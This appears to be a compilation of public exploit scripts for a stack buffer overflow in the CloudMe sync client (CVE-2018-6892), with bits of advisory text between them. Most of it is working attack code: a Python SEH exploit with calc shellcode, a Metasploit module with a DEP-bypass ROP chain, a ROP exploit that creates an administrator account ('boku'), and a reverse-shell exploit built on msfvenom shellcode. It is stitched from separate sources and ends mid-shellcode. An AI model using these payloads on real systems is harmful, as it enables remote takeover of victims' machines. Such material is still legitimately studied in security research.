print 'apparition security\n'
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
ip=raw_input('[+] CloudMe Target IP> ')
nseh="\xEB\x06"+"\x90"*2 #JMP
seh=struct.pack('<L',0x61e7b7f6) #POP,POP RET
junk="A"*2232+nseh+seh+sc+"B"*5600
payload=junk+nseh+seh+sc
def PwnMe(ip,payload):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip,8888))
s.send(payload)
print 'Sending buffer overflow packetz'
raw_input()
if __name__ == '__main__':
PwnMe(ip,payload)
References:
============
https://www.cloudme.com/en/sync#
https://blogs.securiteam.com/index.php/archives/3669
POC Video URL:
=============
https://vimeo.com/255280060
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
SSD Vulnerability submission: January 17, 2018
Would like to acknowledge Beyond Security’s SSD program for the help with co-ordination of this vulnerability.
More details can be found on their blog at:
https://blogs.securiteam.com/index.php/archives/3669
February 11, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
# Exploit Title: Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)
# Date: 2018-08-13
# Exploit Author: Raymond Wellnitz
# Vendor Homepage: https://www.cloudme.com
# Version: 1.8.x/1.9.x
# Tested on: Windows 7 x64
# CVE : 2018-6892
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Cloudme v1.8.x/v1.9.x Buffer Overflow with DEP-Bypass',
'Description' => %q{
This module exploits a stack buffer overflow in Cloudme v1.8.x/v1.9.x.
},
'Author' => [ 'Raymond Wellnitz' ],
'References' =>
[
[ 'CVE', 'CVE-2018-6892' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Privileged' => true,
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00"
},
'Targets' =>
[
[ 'Windows x86_32/64', { 'Ret' => 0x6cfa88a2 } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => '11.02.2018'))
register_options([ Opt::RPORT(8888) ])
end
def create_rop_chain()
rop_gadgets = [
0x6cf98182, # POP EAX # RETN [icuin49.dll]
0x68c848d8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
0x61b4d226, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
0x668d8261, # XCHG EAX,ESI # RETN [libGLESv2.dll]
0x68a5c297, # POP EBP # RETN [Qt5Core.dll]
0x688dd45d, # & JMP ESP [Qt5Core.dll]
0x68abe868, # POP EAX # RETN [Qt5Core.dll]
0xfffffdff, # 201
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
0x689687d2, # XCHG EAX,EBX # RETN
0x68abe868, # POP EAX # RETN [Qt5Core.dll]
0xffffffc0, # 40
0x1004b263, # NEG EAX # RETN [LIBEAY32.dll]
0x6751d479, # XCHG EAX,EDX # RETN [icuuc49.dll]
0x100010c7, # POP ECX # RETN [LIBEAY32.dll]
0x6494ea0a, # &Writable location [libwinpthread-1.dll]
0x68a49534, # POP EDI # RETN [Qt5Core.dll]
0x1008df82, # RETN (ROP NOP) [LIBEAY32.dll]
0x68ad025b, # POP EAX # RETN [Qt5Core.dll]
0x90909090, # NOPS
0x6759bdb4, # PUSHAD # RETN [icuuc49.dll]
].flatten.pack("V*")
return rop_gadgets
end
def exploit
connect
sploit = rand_text_alpha_upper(1036)
sploit << create_rop_chain()
sploit << make_nops(30)
sploit << payload.encoded
print_status("Trying target #{target.name}...")
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow ROP (DEP,ASLR)
# Exploit Author: Bobby Cooke (boku)
# CVE: CVE-2018-6892
# Date: 2020-09-29
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: 1.11.2
# Tested On: Windows 10 (x64) - 10.0.19041 Build 19041
# Script: Python 2.7
# Notes:
# This exploit uses MSVCRT.System to create a new user (boku:0v3R9000!) and add the new user to the
# Administrators group. A requirement of successful exploitation is the CloudMe.exe process must be
# running as adminstrator, such as when ran with 'Run as Administrator'; as this permission is required
# to create new users on the system. This exploit has been tested against multiple Windows 10 systems
# including x86, x64, Pro, Education, Home; although there is no guarantee it will work in your CTF.
# CloudMe 1.11.2 - Turing Complete Add-Admin ROP (DEP,ASLR)
import os,sys,socket,struct
from colorama import Fore, Back, Style
F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE]
B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE]
S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT]
ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0]
err = S[3]+F[2]+'<========'+F[2]+'['+F[5]+'+++'+F[2]+'( '+F[0]+S[0]
def formatMsg(STRING):
return ok+S[3]+F[5]+STRING+S[0]
def formatErr(STRING):
return err+S[3]+F[2]+STRING+S[0]
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------------------
# 0x69900000 | 0x69ac1000 | False | False | False | False | False | [Qt5Network.dll]
# 0x6eb40000 | 0x6eb64000 | False | False | False | False | False | [libgcc_s_dw2-1.dll]
# 0x68a80000 | 0x69055000 | False | False | False | False | False | [Qt5Core.dll]
# 0x00400000 | 0x00831000 | False | False | False | False | False | [CloudMe.exe]
# 0x6d9c0000 | 0x6da0c000 | False | False | False | False | False | [Qt5Sql.dll]
# 0x64b40000 | 0x64b5b000 | False | False | False | False | False | [libwinpthread-1.dll]
# 0x66e00000 | 0x66e3d000 | False | False | False | False | False | [Qt5Xml.dll]
def getESP_RC():
GaDG3Tz = [
# ESP -> EDI
# Clobbers: BL # [EBX+5E5B10C4] must be writable # Requires ROPNOP
# Address=68F79000 Size=0007A000 (499712.) Owner=Qt5Core 68A80000 Section=.eh_fram Type=Imag 01001002 Access=RWE CopyOnWr
0x68bb4678, # POP EBX # RETN [Qt5Core.dll]
0x0A9C8F3C, # EBX + 0x5E5B10C4 = 0x68F7A000 = Writeable Memory
0x68d5e818, # PUSH ESP # OR BL,DL # INC DWORD PTR DS:[EBX+5E5B10C4] # POP EDI # RETN 0x04 [Qt5Core.dll]
0x68D50537, # RETN - ROPNOP
0x68D50537 # RETN - ROPNOP
]
print(formatMsg("Get ESP ROP Chain built!"))
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def msvcrt_rop_chain():
GaDG3Tz = [
# HMODULE LoadLibraryA( LPCSTR lpLibFileName);
# $ ==> > CALL to LoadLibraryA
# $+4 > FileName = "msvcrt.dll"
# EAX = 0x512 = 1298
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFAEE, # NEG FFFFFAEE = 0x512
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EDI + EAX = End of string "msvcrt.dll"
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
# EAX = 0x01
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFFF, # NEG FFFFFFfF = 0x01
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EAX = 0x0
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
# ECX = 0x0
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# Terminate String "msvcrt.dll"
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
# EAX = -0xA = 0xFFFFFFF6
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFF6, # -0xA
# ESI = Start of string "msvcrt.dll\x00"
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
# EAX = PTR LoadLibraryA (from CloudMe Import Table)
# CloudMe Address=0081A168 Section=.idata Type=Import (Known) Name=KERNEL32.LoadLibraryA
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFF7E5E98, # NEG FF7E5E98 = 0081A168 = PTR Kernel32.LoadLibraryA
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EAX = kernel32.LoadLibraryA
0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]
# ESI = kernel32.LoadLibraryA # EAX = Addr string "msvcrt.dll\x00"
0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]
# For PUSHAD we need: EDI=FarRETN # ESI=&LoadLibraryA # EAX=["msvcrt.dll"] # ECX=ROPNOP
0x68d32800, # POP ECX # RETN [Qt5Core.dll]
0x68D50537, # RETN - ROPNOP
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
0x6990F972, # RETN 10 [Qt5Network.dll]
0x68f7bc5e, # pushad # ret # [Qt5Core.dll]
# EAX -> EBP = msvcrt.dll
0x68cc462c # XCHG EAX,EBP # RETN [Qt5Core.dll]
# EBP = msvcrt.dll
]
print(formatMsg("LoadLibraryA(LPSTR \"msvcrt.dll\") ROP Chain built!"))
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def GetProc_system_rop_chain():
GaDG3Tz = [
# FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName);
# $ ==> > CALL to GetProcAddress # EDX (ROPNOP)
# $+4 > hModule = [msvcrt] # ECX
# $+8 > ProcNameOrOrdinal (system) # EAX
# EAX = 0x4a2 = 1186
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFB5E, # NEG FFFFFB5E = 0x4A2
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EDI + EAX = End of string "system"
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
# EAX = 0x01
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFFF, # NEG FFFFFFfF = 0x01
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EAX = 0x0
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
# ECX = 0x0
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# Terminate String "system"
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
# EAX = -0x6 = 0xFFFFFFFA
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFFA, # -0x6
# ESI = Start of string "system\x00"
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
0x68fcf58d, # DEC EBP # RETN [Qt5Core.dll](fix EBP for prev gadgets)
# EAX = PTR GetProcAddr (from CloudMe Import Table)
# CloudMe Address=0081A148 # Section=.idata # Type=Import # Name=KERNEL32.GetProcAddress
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFF7E5EB8, # NEG FF7E5EB8 = 0081A148 = PTR Kernel32.GetProcAddr
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
0x699030c5, # mov eax,dword ptr ds:[eax] [Qt5Network.dll]
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# ESI = &kernel32.GetProcAddr # ECX=["system\x00"]# EBP=msvcrt.dll
# For PUSHAD we need: EDI=FarRETN # ESI=&GetProcAddress # ECX=msvcrt.dll # EAX=["system"]# EDX=ROPNOP
# EBP -> EAX = msvcrt.dll
0x68cc462c, # XCHG EAX,EBP # RETN [Qt5Core.dll]
# ECX=&msvcrt.dll # EAX=["system\x00"]
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# EDX=ROPNOP
0x68f94685, # POP EDX # RETN [Qt5Core.dll]
0x68D50537, # RETN - ROPNOP
# EDI=FarRETN
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
0x699010B4, # ret 0C [Qt5Network.dll]
# KERNEL32.GetProcAddress [ESI pushed to stack]
# [EBP pushed to stack]
# [ESP pushed to stack]
# [EBX pushed to stack]
# land after ret 0xC -> Qt5Core.68D50537 (ROPNOP) [EDX pushed to stack]
# MSVCRT.75F60000 [ECX pushed to stack]
# ASCII "system" [EAX pushed to stack]
0X68f7bc5e, # pushad # ret # [Qt5Core.dll]
0x68b1df17 # XCHG EAX,EDX # RETN # [Qt5Core.dll]
# EDX = msvcrt.system
]
print(formatMsg("GetProcAddress(HMODULE msvcrt, LPCSTR system) ROP Chain built!"))
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def addUsr_rop_chain():
GaDG3Tz = [
# int system( const char *command);
# $ ==> > CALL to system
# $+4 > command = "net user boku 0v3R9000! /add"
# EAX = 0x438 = 1080
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFBC8, # NEG 0xFFFFFBC8 = 0x438
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EDI + EAX = End of string "net user..."
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
# EAX = 0x01
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFFF, # NEG FFFFFFfF = 0x01
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EAX = 0x0
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
# ECX = 0x0
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# Terminate String "net user..."
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
# EAX = -28 = -0x1C = 0xFFFFFFE4
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFE4, # -28 = -0x1C
# ESI = Start of string "net user...\x00"
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
# EDX = MSVCRT.system # ECX=0x0
# For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net user.."] # ECX=POP+RET
0x68d32800, # POP ECX # RETN [Qt5Core.dll]
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
# ESI = MSVCRT.system # EAX = ["net user.."]
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
# EDI=FarRETN
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
0x6990F972, # RETN 10 [Qt5Network.dll]
# PUSHAD - Setup Call to MSVCRT.system on stack
0X68f7bc5e # pushad # ret # [Qt5Core.dll]
]
print(formatMsg("system(const char* \"net user boku 0v3R9000! /add\") ROP Chain built!"))
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def addAdm_rop_chain():
GaDG3Tz = [
# ESI = msvcrt.system
# ESI -> EDX
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
# EAX = 0x3F7
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFC09, # NEG 0xFFFFFC09 = 0x3F7
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EDI + EAX = End of string "net local..."
0x68fc83b0, # add edi, eax # add eax, 41140e0a # ret [Qt5Core.dll]
# EAX = 0x01
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFFF, # NEG FFFFFFfF = 0x01
0x68cef5b2, # NEG EAX # RETN [Qt5Core.dll]
# EAX = 0x0
0x68c7aa16, # DEC EAX # RETN [Qt5Core.dll]
# ECX = 0x0
0x68be726b, # XCHG EAX,ECX # RETN [Qt5Core.dll]
# Terminate String "net local..."
0x68cee06d, # XOR ESI,ESI # RETN [Qt5Core.dll] (Clear ESI)
0x68fbed52, # ADD ESI,EDI # ADD AL,0A # RETN [Qt5Core.dll] (EDI -> ESI)
0x68fa9d0d, # mov [esi], cl # adc al, 41 # ret [Qt5Core.dll]
# EAX = -39 = -0x27 = 0xFFFFFFE4
0x68aec6ab, # POP EAX # RETN [Qt5Core.dll]
0xFFFFFFD9, # -39 = -0x27
# ESI = Start of string "net local...\x00"
0x68c050c0, # ADD ESI,EAX # INC EBP # RETN [Qt5Core.dll]
# EDX = MSVCRT.system # ECX=0x0
# For PUSHAD we need: EDI=FarRETN # ESI=MSVCRT.system # EAX=["net local.."] # ECX=ROPNOP
0x68d32800, # POP ECX # RETN [Qt5Core.dll]
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
# ESI = MSVCRT.system # EAX = ["net local.."]
0x68b1df17, # XCHG EAX,EDX # RETN # [Qt5Core.dll]
0x68b48196, # XCHG EAX,ESI # RETN [Qt5Core.dll]
# EDI=FarRETN
0x699f37ad, # POP EDI # RETN [Qt5Network.dll]
0x6990F972, # RETN 10 [Qt5Network.dll]
# PUSHAD - Setup Call to MSVCRT.system on stack
0X68f7bc5e # pushad # ret # [Qt5Core.dll]
]
print(formatMsg("system(const char* \"net localgroup Administrators boku /add\") ROP Chain built!"))
return ''.join(struct.pack('<I', _) for _ in GaDG3Tz)
def sendRecv(s,p):
print(formatMsg("Sending payload: "))
print(S[3]+F[7]+payload+S[0])
s.send(p)
data = s.recv(1024)
return data
def header():
head = S[3]+F[2]+' --- Cloudme v1.12 | Add Admin (boku:0v3R9000!) ---\n'+S[0]
return head
def sig():
SIG = S[3]+F[4]+" .-----.._ ,--.\n"
SIG += F[4]+" | .. > ___ | | .--.\n"
SIG += F[4]+" | |.' ,'-'"+F[2]+"* *"+F[4]+"'-. |/ /__ __\n"
SIG += F[4]+" | </ "+F[2]+"* * *"+F[4]+" \ / \\/ \\\n"
SIG += F[4]+" | |> ) "+F[2]+" * *"+F[4]+" / \\ \\\n"
SIG += F[4]+" |____..- '-.._..-'_|\\___|._..\\___\\\n"
SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0]
return SIG
def footer():
foot = formatMsg('Requires that the Cloudme program is ran using \'Run As Administrator\'\n')
return foot
if __name__ == "__main__":
print(header())
print(sig())
print(footer())
if len(sys.argv) != 3:
print(formatErr("Usage: python %s <IP> <PORT>" % sys.argv[0]))
print(formaterr("Example: python %s '127.0.0.1' 8888" % sys.argv[0]))
sys.exit(-1)
host = sys.argv[1]
port = int(sys.argv[2])
rop_chain = getESP_RC() + msvcrt_rop_chain() + getESP_RC() + GetProc_system_rop_chain() + getESP_RC() + addUsr_rop_chain() + getESP_RC() + addAdm_rop_chain()
os_EIP = '\41'*1052
os_nSEH = '\x41'*(2344-len(os_EIP + rop_chain))
nSEH = '\x42'*4
SEH = '\x43'*4
buff = os_EIP + rop_chain + os_nSEH + nSEH + SEH
term = '\r\n'
kern32 = 'msvcrt.dll'+'AAAAAA'
winExe = 'system'+'BBBBBB'
addUsr = 'net user boku 0v3R9000! /add'+'CCCC'
addAdm = 'net localgroup Administrators boku /add'+'DDDD'
rmdr = '\x44'*(3854-len(buff)-len(kern32)-len(winExe)-len(addAdm))
payload = buff + kern32 + winExe + addUsr + addAdm + rmdr + term
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
print(formatMsg( "Successfully connected to "+host+" on port "+str(port)))
resp = sendRecv(sock,payload)
print(formatMsg("Closing Socket"))
sock.close()
print(formatErr("Exiting python script."))
except:
print(formatErr("Failed to connect and send payload."))
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (SEH,DEP,ASLR)
# Date: 2020-05-20
# Exploit Author: Xenofon Vassilakopoulos
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 7 Professional x86 SP1
# Steps to reproduce:
# 1. On your local machine start the CloudMe service.
# 2. change the reverse tcp shellcode using the IP and Port of your host using the following command
# msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0d\x0a" -f python
# 3. Run the python script.
import struct
import socket
target = "127.0.0.1"
########################################################################
# Get kernel32 address from the stack
# 0022ff8c 77883c45 kernel32!BaseThreadInitThunk+0xe
rop = struct.pack('L',0x699012c9) # POP EBP # RETN [Qt5Network.dll]
rop+= struct.pack('L',0x0385FF88) # Offset
rop+= struct.pack('L',0x68a9559e) # XCHG EAX,EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae4fe3) # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x0362fffc) # Offset
rop+= struct.pack('L',0x68ad422b) # SUB EAX,ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68ae8a22) # MOV EAX,DWORD PTR [EAX] # RETN [Qt5Core.dll]
# Calculate VirtualProtect relative to the leaked kernel32 address
rop+= struct.pack('L',0x68a812c9) # POP EBP # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffae493) # Offset
rop+= struct.pack('L',0x61ba8137) # ADD EAX,EBP # RETN [Qt5Gui.dll]
########################################################################
# Setup VirtualProtect
# edi
rop+= struct.pack('L',0x6d9c23ab) # POP EDI # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c1011) # RETN (ROP NOP) [Qt5Sql.dll]
# esi
rop+= struct.pack('L',0x61b63b3c) # XCHG EAX, ESI # RETN # ptr to virtualprotect
# edx
rop+= struct.pack('L',0x68d327ff) # POP EAX # POP ECX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xffffffc0) # Value to negate, will become 0x00000040
rop+= struct.pack('L',0x41414141) # Filler
rop+= struct.pack('L',0x68cef5b2) # NEG EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x68b1df17) # XCHG EAX,EDX # RETN [Qt5Core.dll]
# ebx
rop+= struct.pack('L',0x68ae7ee3) # POP EAX # RETN [Qt5Core.dll]
rop+= struct.pack('L',0xfffffdff) # Value to negate, will become 0x00000201
rop+= struct.pack('L',0x6d9e431a) # NEG EAX # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x68aad07c) # XCHG EAX,EBX # RETN [Qt5Core.dll]
# ebp
rop+= struct.pack('L',0x6d9c12c9) # POP EBP # RETN [Qt5Sql.dll]
rop+= struct.pack('L',0x6d9c12c9) # skip 4 bytes
# eax & ecx
rop+= struct.pack('L',0x6fe4dc57) # POP EAX # POP ECX # RETN [libstdc++-6.dll]
rop+= struct.pack('L',0x90909090) # NOP
rop+= struct.pack('L',0x68ee6b16) # &Writable location [Qt5Core.dll]
# push registers to stack
rop+= struct.pack('L',0x68ef1b07) # PUSHAD # RETN [Qt5Core.dll]
rop+= struct.pack('L',0x64b4d6cd) # JMP ESP [libwinpthread-1.dll]
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.6 LPORT=443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python
buf = b""
buf += b"\xbf\xa4\x90\x9d\x67\xd9\xc7\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x7a\x12\x83\xc2\x04\x03\xde\x9e\x7f"
buf += b"\x92\xe2\x77\xfd\x5d\x1a\x88\x62\xd7\xff\xb9\xa2\x83"
buf += b"\x74\xe9\x12\xc7\xd8\x06\xd8\x85\xc8\x9d\xac\x01\xff"
buf += b"\x16\x1a\x74\xce\xa7\x37\x44\x51\x24\x4a\x99\xb1\x15"
buf += b"\x85\xec\xb0\x52\xf8\x1d\xe0\x0b\x76\xb3\x14\x3f\xc2"
buf += b"\x08\x9f\x73\xc2\x08\x7c\xc3\xe5\x39\xd3\x5f\xbc\x99"
buf += b"\xd2\x8c\xb4\x93\xcc\xd1\xf1\x6a\x67\x21\x8d\x6c\xa1"
buf += b"\x7b\x6e\xc2\x8c\xb3\x9d\x1a\xc9\x74\x7e\x69\x23\x87"
buf += b"\x03\x6a\xf0\xf5\xdf\xff\xe2\x5e\xab\x58\xce\x5f\x78"
buf += b"\x3e\x85\x6c\x35\x34\xc1\x70\xc8\x99\x7a\x8c\x41\x1c"
buf += b"\xac\x04\x11\x3b\x68\x4c\xc1\x22\x29\x28\xa4\x5b\x29"
buf += b"\x93\x19\xfe\x22\x3e\x4d\x73\x69\x57\xa2\xbe\x91\xa7"
buf += b"\xac\xc9\xe2\x95\x73\x62\x6c\x96\xfc\xac\x6b\xd9\xd6"
buf += b"\x09\xe3\x24\xd9\x69\x2a\xe3\x8d\x39\x44\xc2\xad\xd1"
buf += b"\x94\xeb\x7b\x75\xc4\x43\xd4\x36\xb4\x23\x84\xde\xde"
buf += b"\xab\xfb\xff\xe1\x61\x94\x6a\x18\xe2\x5b\xc2\x23\xf4"
buf += b"\x33\x11\x23\xf9\x78\x9c\xc5\x93\x6e\xc9\x5e\x0c\x16"
buf += b"\x50\x14\xad\xd7\x4e\x51\xed\x5c\x7d\xa6\xa0\x94\x08"
buf += b"\xb4\x55\x55\x47\xe6\xf0\x6a\x7d\x8e\x9f\xf9\x1a\x4e"
buf += b"\xe9\xe1\xb4\x19\xbe\xd4\xcc\xcf\x52\x4e\x67\xed\xae"
buf += b"\x16\x40\xb5\x74\xeb\x4f\x34\xf8\x57\x74\x26\xc4\x58"
buf += b"\x30\x12\x98\x0e\xee\xcc\x5e\xf9\x40\xa6\x08\x56\x0b"
buf += b"\x2e\xcc\x94\x8c\x28\xd1\xf0\x7a\xd4\x60\xad\x3a\xeb"
buf += b"\x4d\x39\xcb\x94\xb3\xd9\x34\x4f\x70\xf9\xd6\x45\x8d"
buf += b"\x92\x4e\x0c\x2c\xff\x70\xfb\x73\x06\xf3\x09\x0c\xfd"
buf += b"\xeb\x78\x09\xb9\xab\x91\x63\xd2\x59\x95\xd0\xd3\x4b"
##########
junk1 = "\x41"*1604
nops = "\x90"*16
junk2 = "C"*(2236 - len(nops) - len(buf) - len(rop) - len(junk1))
seh = struct.pack('L',0x6998fb2e) # ADD ESP,76C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [Qt5Network.dll]
payload = junk1 + rop + nops + buf + junk2 + seh
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
except Exception as e:
print(sys.exc_value)
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f"
payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8"
payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f"
payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43"
payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee"
payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4"
payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a"
payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff"
payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33"
